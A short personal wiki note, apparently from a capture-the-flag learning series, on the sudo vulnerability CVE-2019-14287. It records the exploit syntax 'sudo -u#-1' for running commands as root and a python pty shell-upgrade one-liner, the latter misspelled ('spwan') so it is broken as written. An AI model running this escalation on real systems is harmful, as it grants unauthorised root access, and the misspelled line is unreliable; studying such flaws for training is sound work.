Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-05-13T11:47:05-04:00

====== sudo bug ======
Created Wednesday 13 May 2020


CVE-2019-14287 is a vulnerability found in the Unix Sudo program by a researcher working for Apple: Joe Vennix. Coincidentally, he also found the vulnerability that we'll be covering in the next room of this series. This exploit has since been fixed, but may still be present in older versions of Sudo (versions < 1.8.28), so it's well worth keeping an eye out for!




sudo -u#<id> <command>

sudo -u#-1 whoami


tty to shell

python -c  'import pty;pty.spwan("/bin/bash")'
